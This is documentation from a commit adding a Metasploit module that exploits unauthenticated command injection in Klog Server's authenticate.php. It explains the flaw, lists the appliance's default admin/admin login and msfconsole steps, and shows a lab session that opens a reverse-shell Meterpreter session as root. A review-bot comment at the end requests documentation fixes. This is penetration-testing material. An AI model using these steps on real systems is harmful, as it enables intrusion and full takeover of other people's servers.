Add Klog Server authenticate.php user Unauthenticated Command Injection

Brendan Coles
2021-02-12 17:07:52 +00:00
parent f456c965ff
commit bdc2041c83
2 changed files with 289 additions and 0 deletions
@@ -0,0 +1,130 @@
## Vulnerable Application
This module exploits an unauthenticated command injection vulnerability
in [Klog Server](https://www.klogserver.com/) versions 2.4.1 and prior.
The `authenticate.php` file uses the `user` HTTP POST parameter in a call
to the `shell_exec()` PHP function without appropriate input validation,
allowing arbitrary command execution as the apache user.
The sudo configuration permits the apache user to execute any command
as root without providing a password, resulting in privileged command
execution as root.
This module has been successfully tested on Klog Server version 2.4.1
virtual appliance.
Download:
* https://www.klogserver.com/download/ova/2.4.1/klogserver.ova
## Verification Steps
The virtual appliance makes use of a default IP address `10.10.56.51`.
To change the network settings:
1. Login as `admin` - the default console and SSH credentials are `admin` / `admin`.
1. Select menu option `Ağ ayarları` (1) to view network settings
```
=== ANA MENÜ ===========================================================
1. Ağ ayarları
2. Sorun giderme
3. Bakım
4. Cıkış
Çalıştırmak istediğiniz komutun sayısını giriniz: 1
```
1. Select menu option `Ağ ayarlarını güncelle` (2) to change the current network configuration
```
--- AĞ AYARLARI --------------------------------------------------------
1. Ağ ayarlarını göster
2. Ağ ayarlarını güncelle
3. Ana menüye dön
Çalıştırmak istediğiniz komutun sayısını giriniz: 2
```
1. Enter the desired IP address, netmask, and gateway
```
Yeni IP adresi giriniz. Menüye dönmek için Enter'a basınız:
> 10.1.1.123
IP adres: 10.1.1.123
Yeni alt ag maskesini giriniz. Menüye dönmek için Enter'a basınız:
> 255.255.255.0
IP adres: 10.1.1.123
Alt ağ maskesi: 255.255.255.0
Yeni ağ geçidini giriniz. Menüye dönmek için Enter'a basınız:
> 10.1.1.1
IP adres: 10.1.1.123
Alt ağ maskesi: 255.255.255.0
Ağ geçidi: 10.1.1.1
Ayarlar uygulanıyor...
```
Metasploit:
1. Start msfconsole
1. Do: `use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection`
1. Do: `set RHOSTS [IP]`
1. Do: `set TARGET [TARGET]`
1. Do: `set PAYLOAD [PAYLOAD]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`
## Options
### TARGETURI
The base path of the Klog Server (Default: `/`)
### USE_SUDO
Execute payload as root using `sudo` (Default: `true`)
## Scenarios
### Klog Server version 2.4.1
```
msf6 > use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set rhosts 10.1.1.123
rhosts => 10.1.1.123
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > check
[+] 10.1.1.123:443 - The target is vulnerable. Response received after 9 seconds.
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set target 0
target => 0
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set lhost 10.1.1.105
lhost => 10.1.1.105
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run
[*] Started reverse TCP handler on 10.1.1.105:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Response received after 11 seconds.
[*] Sending stage (980808 bytes) to 10.1.1.123
[*] Meterpreter session 1 opened (10.1.1.105:4444 -> 10.1.1.123:35824) at 2021-02-11 22:59:15 -0500
[*] Command Stager progress - 100.00% done (773/773 bytes)
meterpreter > getuid
Server username: root @ klogserver.klogserver.com (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : klogserver.klogserver.com
OS : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
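Review bot: the Verification Steps tell the reader to run `set TARGET [TARGET]` and the scenario runs `set target 0`, but the Options section documents only `TARGETURI` and `USE_SUDO` and never lists the module's targets; add a short Targets list (index, name, and what each one selects) so a reader knows what `0` means and what the alternatives are. The `check` behaviour is also undocumented: the scenario output ("The target is vulnerable. Response received after 9 seconds.") indicates a delay-based check, which is worth stating explicitly in the Vulnerable Application or Verification Steps section, since it injects a measurable wait into the target's response and can misreport on a slow or heavily loaded host. Finally, the `USE_SUDO` description should say what happens when the sudo configuration does not permit the `apache` user to run commands as root, i.e. whether the payload still runs as `apache` or the module fails, so the reader knows which outcome to expect from the default `true`.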